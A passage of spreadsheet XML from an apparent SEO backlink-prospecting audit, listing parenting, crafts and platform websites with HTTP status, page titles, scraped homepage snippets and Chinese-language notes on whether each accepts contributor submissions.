        <x:v>https://freelibrary.org/</x:v>
      </x:c>
      <x:c r="N35" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O35" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P35" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q35" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R35" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S35" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T35" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://freelibrary.org</x:v>
      </x:c>
    </x:row>
    <x:row r="36">
      <x:c r="A36" s="18" t="str">
        <x:v>35</x:v>
      </x:c>
      <x:c r="B36" s="19" t="str">
        <x:v>ohcreativeday.com</x:v>
      </x:c>
      <x:c r="C36" s="19" t="str">
        <x:v>https://ohcreativeday.com</x:v>
      </x:c>
      <x:c r="D36" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E36" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F36" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G36" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H36" s="19" t="str">
        <x:v>https://ohcreativeday.com/</x:v>
      </x:c>
      <x:c r="I36" s="19" t="str">
        <x:v>Oh Creative Day | Arts and crafts | picture books | learning | play for kids - Oh Creative Day</x:v>
      </x:c>
      <x:c r="J36" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K36" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L36" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M36" s="19" t="str">
        <x:v>https://ohcreativeday.com/</x:v>
      </x:c>
      <x:c r="N36" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O36" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P36" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q36" s="21" t="str">
        <x:v>Oh Creative Day | Arts and crafts | picture books | learning | play for kids - Oh Creative Day Home About The Blog Kid Life Reading Learning Creating Playing Mum Life Parenting Oh Creative Lady Celebrating Printables Shop Work with me Contact Select Page That’s my name! On the front cover of a book! MY BOOK! I’m trying to act cool about it, you guys, but I CAN’T EVEN DEAL. The Little Artists’ Big Book of Activities , contains 60 fun and creative projects to explore colour, patterns, shapes, art, history and more. I’ve written it in my friendliest Teacher Voice so that you can learn through art at your place. It’s 168 pages of creative fun! For ages 4 – 10. My book is out in May ’22 and you c</x:v>
      </x:c>
      <x:c r="R36" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S36" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T36" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ohcreativeday.com</x:v>
      </x:c>
    </x:row>
    <x:row r="37">
      <x:c r="A37" s="18" t="str">
        <x:v>36</x:v>
      </x:c>
      <x:c r="B37" s="19" t="str">
        <x:v>squarespace.com</x:v>
      </x:c>
      <x:c r="C37" s="19" t="str">
        <x:v>https://squarespace.com</x:v>
      </x:c>
      <x:c r="D37" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E37" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F37" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G37" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H37" s="19" t="str">
        <x:v>https://www.squarespace.com/</x:v>
      </x:c>
      <x:c r="I37" s="19" t="str">
        <x:v>Website Builder – Easily Create Your Own Website &amp;mdash; Squarespace</x:v>
      </x:c>
      <x:c r="J37" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K37" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L37" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M37" s="19" t="str">
        <x:v>https://www.squarespace.com/</x:v>
      </x:c>
      <x:c r="N37" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O37" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P37" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q37" s="21" t="str">
        <x:v>Create a website and grow your business with a free Squarespace trial. Start with customizable website templates, AI website builder tools, or a domain name. Website Builder – Easily Create Your Own Website &amp;mdash; Squarespace Skip to Main Content → Products Solutions Resources Preise Log In undefined undefined Account Dashboard Domains Log Out Get started → Start a Free Trial → Products Website Websites → Website Templates → AI Website Builder → Design Intelligence → Ecommerce → Portfolios → Blogs → Analytics → Business Services → Online Stores → Invoicing → Scheduling → Limited Releases → Content &amp; Memberships → Donations → Financial Solutions → Marketing Marketing Tools → Email Campaigns → SEO Tools → AI Visibility → Free Tools → Business Tools Domain Search → Domain Transfer → Business Email → View All Features → For scaling businesses Square</x:v>
      </x:c>
      <x:c r="R37" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S37" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T37" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://squarespace.com</x:v>
      </x:c>
    </x:row>
    <x:row r="38">
      <x:c r="A38" s="18" t="str">
        <x:v>37</x:v>
      </x:c>
      <x:c r="B38" s="19" t="str">
        <x:v>youcandiyblog.com</x:v>
      </x:c>
      <x:c r="C38" s="19" t="str">
        <x:v>https://youcandiyblog.com</x:v>
      </x:c>
      <x:c r="D38" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E38" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F38" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G38" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H38" s="19" t="str">
        <x:v>https://youcandiyblog.com/</x:v>
      </x:c>
      <x:c r="I38" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J38" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K38" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L38" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M38" s="19" t="str">
        <x:v>https://youcandiyblog.com/</x:v>
      </x:c>
      <x:c r="N38" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O38" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P38" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q38" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R38" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S38" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T38" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://youcandiyblog.com</x:v>
      </x:c>
    </x:row>
    <x:row r="39">
      <x:c r="A39" s="18" t="str">
        <x:v>38</x:v>
      </x:c>
      <x:c r="B39" s="19" t="str">
        <x:v>ththsearch.top</x:v>
      </x:c>
      <x:c r="C39" s="19" t="str">
        <x:v>https://ththsearch.top</x:v>
      </x:c>
      <x:c r="D39" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E39" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F39" s="20"/>
      <x:c r="G39" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H39" s="19" t="str"/>
      <x:c r="I39" s="19" t="str"/>
      <x:c r="J39" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K39" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L39" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M39" s="19" t="str">
        <x:v>https://ththsearch.top</x:v>
      </x:c>
      <x:c r="N39" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O39" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P39" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q39" s="21" t="str"/>
      <x:c r="R39" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S39" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T39" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://ththsearch.top
http://ththsearch.top</x:v>
      </x:c>
    </x:row>
    <x:row r="40">
      <x:c r="A40" s="18" t="str">
        <x:v>39</x:v>
      </x:c>
      <x:c r="B40" s="19" t="str">
        <x:v>mommypoppins.com</x:v>
      </x:c>
      <x:c r="C40" s="19" t="str">
        <x:v>https://mommypoppins.com</x:v>
      </x:c>
      <x:c r="D40" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E40" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F40" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G40" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H40" s="19" t="str">
        <x:v>https://mommypoppins.com/</x:v>
      </x:c>
      <x:c r="I40" s="19" t="str">
        <x:v>Mommy Poppins - Things to Do with Kids</x:v>
      </x:c>
      <x:c r="J40" s="19" t="str">
        <x:v>亲子活动媒体</x:v>
      </x:c>
      <x:c r="K40" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L40" s="19" t="str">
        <x:v>Contributor pitch</x:v>
      </x:c>
      <x:c r="M40" s="19" t="str">
        <x:v>https://mommypoppins.com/contributor-faq</x:v>
      </x:c>
      <x:c r="N40" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O40" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P40" s="21" t="str">
        <x:v>有 contributor pitch 入口，但需要符合亲子活动读者需求，不能只提交产品链接。</x:v>
      </x:c>
      <x:c r="Q40" s="21" t="str">
        <x:v>Mommy Poppins Mommy Poppins - Things to Do with Kids Skip to main content MAKE YOUR DAY Login Get Listed My Profile My Cart Sign out My Profile Sign out Login Get Listed Close Menu Calendar Submit an Activity Games &amp; Activities Crafts for Kids Recipes Science for Kids Games &amp; Activities Online &amp; Virtual Parenting Parenting Guide Baby &amp; Maternity Teen &amp; Tween Guide Top Toys &amp; Gear Camps Camp Guide Parties Gift Guide Party Ideas Halloween Thanksgiving Christmas and Hanukkah All Holidays Family Travel Family Vacations Resorts &amp; Hotels Theme &amp; Water Parks New England Travel Cape Cod, Nantucket &amp; The Vineyard Jersey Shore Guide Poconos Vacation Guide Menu Find fun in Close Menu Anywhere Atlanta Boston Chicago </x:v>
      </x:c>
      <x:c r="R40" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S40" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T40" s="21" t="str">
        <x:v>可投‘在家做单位换算/测量的亲子科学活动’。 | 请求: https://mommypoppins.com</x:v>
      </x:c>
    </x:row>
    <x:row r="41">
      <x:c r="A41" s="18" t="str">
        <x:v>40</x:v>
      </x:c>
      <x:c r="B41" s="19" t="str">
        <x:v>craftering.com</x:v>
      </x:c>
      <x:c r="C41" s="19" t="str">
        <x:v>https://craftering.com</x:v>
      </x:c>
      <x:c r="D41" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E41" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F41" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G41" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H41" s="19" t="str">
        <x:v>https://craftering.com/</x:v>
      </x:c>
      <x:c r="I41" s="19" t="str">
        <x:v>craftering.com – Crafting Directory</x:v>
      </x:c>
      <x:c r="J41" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K41" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L41" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M41" s="19" t="str">
        <x:v>https://craftering.com/</x:v>
      </x:c>
      <x:c r="N41" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O41" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P41" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q41" s="21" t="str">
        <x:v>craftering.com – Crafting Directory Skip to content craftering.com Crafting Directory Menu Menu Home DIY and Tutorial Inspiration and Ideas Techniques and Tips About 11+ Quilt Backing Ideas for Beautiful Creations August 24, 2026 by craftering 12 Quilt Backing Ideas for Beautiful Creations offer a variety of inspiring options to elevate your quilting projects and add a stunning finishing touch to your quilts Categories @web Tags Quilting Stitch 21+ Hand Quilting Stitch Vs Machine Quilting Stitch Ideas August 24, 2026 by craftering 22 Hand Quilting Stitch Vs Machine Quilting Stitch Ideas offer a captivating array of techniques that can elevate your quilting projects and inspire your creative </x:v>
      </x:c>
      <x:c r="R41" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S41" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T41" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://craftering.com</x:v>
      </x:c>
    </x:row>
    <x:row r="42">
      <x:c r="A42" s="18" t="str">
        <x:v>41</x:v>
      </x:c>
      <x:c r="B42" s="19" t="str">
        <x:v>thesavvymamma.com</x:v>
      </x:c>
      <x:c r="C42" s="19" t="str">
        <x:v>https://thesavvymamma.com</x:v>
      </x:c>
      <x:c r="D42" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E42" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F42" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G42" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H42" s="19" t="str">
        <x:v>https://thesavvymamma.com/</x:v>
      </x:c>
      <x:c r="I42" s="19" t="str">
        <x:v>The Savvy Mamma | Ultimate Lifestyle Blog</x:v>
      </x:c>
      <x:c r="J42" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K42" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L42" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M42" s="19" t="str">
        <x:v>https://thesavvymamma.com/</x:v>
      </x:c>
      <x:c r="N42" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O42" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P42" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q42" s="21" t="str">
        <x:v>A place to help women manage their money, live with less, thrive in their season and enjoy the outdoors. Sharing side hustle ideas, minimalism and saving tips. The Savvy Mamma | Ultimate Lifestyle Blog Home About Me Blog Categories Adelaide Parents Education Home &amp; Garden Money Minimalism Motherhood Outside Poems Reviews Self-Help Thermomix Media Discount Codes Contact Menu Home About Me Blog Categories Adelaide Parents Education Home &amp; Garden Money Minimalism Motherhood Outside Poems Reviews Self-Help Thermomix Media Discount Codes Contact Instagram Facebook Search Close Money . Minimalism . Motherhood Ultimate lifestyle blog A place to help women manage their money, live with less, thrive in their season and enjoy the outdoors. GET READING Money . Minimalism . Motherhood Ultimate lifestyle blog A place to help women manage their money, live with </x:v>
      </x:c>
      <x:c r="R42" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S42" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T42" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thesavvymamma.com</x:v>
      </x:c>
    </x:row>
    <x:row r="43">
      <x:c r="A43" s="18" t="str">
        <x:v>42</x:v>
      </x:c>
      <x:c r="B43" s="19" t="str">
        <x:v>susieofalltrades.com</x:v>
      </x:c>
      <x:c r="C43" s="19" t="str">
        <x:v>https://susieofalltrades.com</x:v>
      </x:c>
      <x:c r="D43" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E43" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F43" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G43" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H43" s="19" t="str">
        <x:v>https://www.susieofalltrades.com/</x:v>
      </x:c>
      <x:c r="I43" s="19" t="str">
        <x:v>-</x:v>
      </x:c>
      <x:c r="J43" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K43" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L43" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M43" s="19" t="str">
        <x:v>https://www.susieofalltrades.com/</x:v>
      </x:c>
      <x:c r="N43" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O43" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P43" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q43" s="21" t="str">
        <x:v>- About Why I write. Everyday life – Blog Lessons Art Lessons A happy home Charts and systems In the kitchen Recipes Faith Primary Singing Time April 2020 Singing Time Activities – Love One Another Family Home Evening Travel Contact me Family of six. January 1, 2022 by sueboo August 2021 marked the first anniversary of our family. I spent the entire month as a “single parent” navigating the first day of school for a junior, freshman, 7th grader and kindergartener. Somewhere in there I managed to squeeze in dropping off my oldest for her first year of college. I also started up classes as a Let’s Play Music teacher. Without Tim. He was navigating his first business trip as a new(ish) employee</x:v>
      </x:c>
      <x:c r="R43" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S43" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T43" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://susieofalltrades.com</x:v>
      </x:c>
    </x:row>
    <x:row r="44">
      <x:c r="A44" s="18" t="str">
        <x:v>43</x:v>
      </x:c>
      <x:c r="B44" s="19" t="str">
        <x:v>castleandkite.com</x:v>
      </x:c>
      <x:c r="C44" s="19" t="str">
        <x:v>https://castleandkite.com</x:v>
      </x:c>
      <x:c r="D44" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E44" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F44" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G44" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H44" s="19" t="str">
        <x:v>https://castleandkite.com/</x:v>
      </x:c>
      <x:c r="I44" s="19" t="str">
        <x:v>Castle &amp; Kite | Craft Boxes | Educational Resources</x:v>
      </x:c>
      <x:c r="J44" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K44" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L44" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M44" s="19" t="str">
        <x:v>https://castleandkite.com/</x:v>
      </x:c>
      <x:c r="N44" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O44" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P44" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q44" s="21" t="str">
        <x:v>We sell gorgeous kids craft boxes, digital products and learning resources to encourage fine motor development and creativity. Afterpay available. Easy kids craft ideas, information on parenting and child development on the blog. All our products are designed by an Early Years Teacher with your child in mind. Castle &amp; Kite | Craft Boxes | Educational Resources Skip to content Shop Shop Magic Water Scroll Craft Boxes Craft Boxes Subscriptions Craft Box Themes Collections Collections Toys &amp; Books Digital Learning Resources Creative Art Supplies Bestsellers Stocking Stuffers Bundles Shop by Price Shop by Price Under $35 $35 - $50 Over $50 Wholesale Our Story Blog Country/region Japan (JPY ¥) Japan (JPY ¥) Afghanistan (AUD $) Åland Islands (EUR €) Albania (AUD $) Algeria (AUD $) Andorra (EUR €) Angola (AUD $) Anguilla (AUD $) Antigua &amp; Barbuda (AUD $) Argentina (AUD $) Armenia (AUD $) Aruba (AUD $) Ascension Island (AUD $) Australia (AUD $) Austria (EUR €) Azerbaijan (AUD $) Bahamas (AUD $) Bahrain (</x:v>
      </x:c>
      <x:c r="R44" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S44" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T44" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://castleandkite.com</x:v>
      </x:c>
    </x:row>
    <x:row r="45">
      <x:c r="A45" s="18" t="str">
        <x:v>44</x:v>
      </x:c>
      <x:c r="B45" s="19" t="str">
        <x:v>grokipedia.com</x:v>
      </x:c>
      <x:c r="C45" s="19" t="str">
        <x:v>https://grokipedia.com</x:v>
      </x:c>
      <x:c r="D45" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E45" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F45" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G45" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H45" s="19" t="str">
        <x:v>https://grokipedia.com/</x:v>
      </x:c>
      <x:c r="I45" s="19" t="str">
        <x:v>Grokipedia</x:v>
      </x:c>
      <x:c r="J45" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K45" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L45" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M45" s="19" t="str">
        <x:v>https://grokipedia.com/</x:v>
      </x:c>
      <x:c r="N45" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O45" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P45" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q45" s="21" t="str">
        <x:v>Grokipedia is an open source, comprehensive collection of all knowledge. Grokipedia Suggest Article Sign in The Beatles Albert Einstein Artificial intelligence Quantum computing Transformer Nobel Prize in Literature Nobel Prize in Physics Queen Articles 0 Articles 0 Terms of Service • Privacy Policy • Acceptable Use Sign in to contribute Create an account or sign in to suggest articles and edits to Grokipedia. Sign in Suggest an article Know something the world should know? Tell us what to write about. New Article Suggest Edit Topic (optional if you add details) Details (optional if you add a topic) What makes a great suggestion? Specific beats broad — "CRISPR" over "Biology" People, events, and breakthroughs are ideal Search first to check if it already exists C</x:v>
      </x:c>
      <x:c r="R45" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S45" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T45" s="21" t="str">
        <x:v>请求: https://grokipedia.com</x:v>
      </x:c>
    </x:row>
    <x:row r="46">
      <x:c r="A46" s="18" t="str">
        <x:v>45</x:v>
      </x:c>
      <x:c r="B46" s="19" t="str">
        <x:v>otholly.com</x:v>
      </x:c>
      <x:c r="C46" s="19" t="str">
        <x:v>https://otholly.com</x:v>
      </x:c>
      <x:c r="D46" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E46" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F46" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G46" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H46" s="19" t="str">
        <x:v>https://otholly.com/</x:v>
      </x:c>
      <x:c r="I46" s="19" t="str">
        <x:v>Home - Toddler Development</x:v>
      </x:c>
      <x:c r="J46" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K46" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L46" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M46" s="19" t="str">
        <x:v>https://otholly.com/</x:v>
      </x:c>
      <x:c r="N46" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O46" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P46" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q46" s="21" t="str">
        <x:v>Child development and activities for your toddler Home - Toddler Development Skip to content Instagram Youtube Facebook-f Download Free Toddler Development Milestones Charts SNAG FOR FREE Every mama needs her village Goodbye Comparison, Hello Play Tell me more Setting our toddlers up for success in life sure can be overwhelming. Here’s how I can help: Playful Pod Membership Join my monthly play and child development membership community to master toddler development and set your toddler up for success. JOIN THE POD Printables Shop From schedule cards to healthy eating flash cards, you can find toddler friendly printables here. YES PLEASE Sensory Self Care e-Book Ever feel overwhelmed by all the noise that comes with parenting? Felling touch</x:v>
      </x:c>
      <x:c r="R46" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S46" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T46" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://otholly.com</x:v>
      </x:c>
    </x:row>
    <x:row r="47">
      <x:c r="A47" s="18" t="str">
        <x:v>46</x:v>
      </x:c>
      <x:c r="B47" s="19" t="str">
        <x:v>adorecherishlove.com</x:v>
      </x:c>
      <x:c r="C47" s="19" t="str">
        <x:v>https://adorecherishlove.com</x:v>
      </x:c>
      <x:c r="D47" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E47" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F47" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G47" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H47" s="19" t="str">
        <x:v>http://www.adorecherishlove.com/</x:v>
      </x:c>
      <x:c r="I47" s="19" t="str">
        <x:v>adore cherish love</x:v>
      </x:c>
      <x:c r="J47" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K47" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L47" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M47" s="19" t="str">
        <x:v>http://www.adorecherishlove.com/</x:v>
      </x:c>
      <x:c r="N47" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O47" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P47" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q47" s="21" t="str">
        <x:v>adore cherish love Pages Home about contact Play Ideas Tuesday, November 22, 2016 This blog has moved It's been such a long time since I've posted something here! I've been busy working super hard on my teaching printables business, Little Lifelong Learners . In the year and a half (oh my goodness!!) since I've posted here, I've actually added another beautiful little person to my family. I now have a 2.5 year old and a 4 month old. They keep me super busy! But in my spare time, I've been blogging over at Little Lifelong Learners and posting super fun play ideas over on my instagram account . Over on the new blog, I post ideas for play-based learning as well as teaching and learning inspirat</x:v>
      </x:c>
      <x:c r="R47" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S47" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T47" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://adorecherishlove.com
http://adorecherishlove.com</x:v>
      </x:c>
    </x:row>
    <x:row r="48">
      <x:c r="A48" s="18" t="str">
        <x:v>47</x:v>
      </x:c>
      <x:c r="B48" s="19" t="str">
        <x:v>weebly.com</x:v>
      </x:c>
      <x:c r="C48" s="19" t="str">
        <x:v>https://weebly.com</x:v>
      </x:c>
      <x:c r="D48" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="E48" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F48" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G48" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
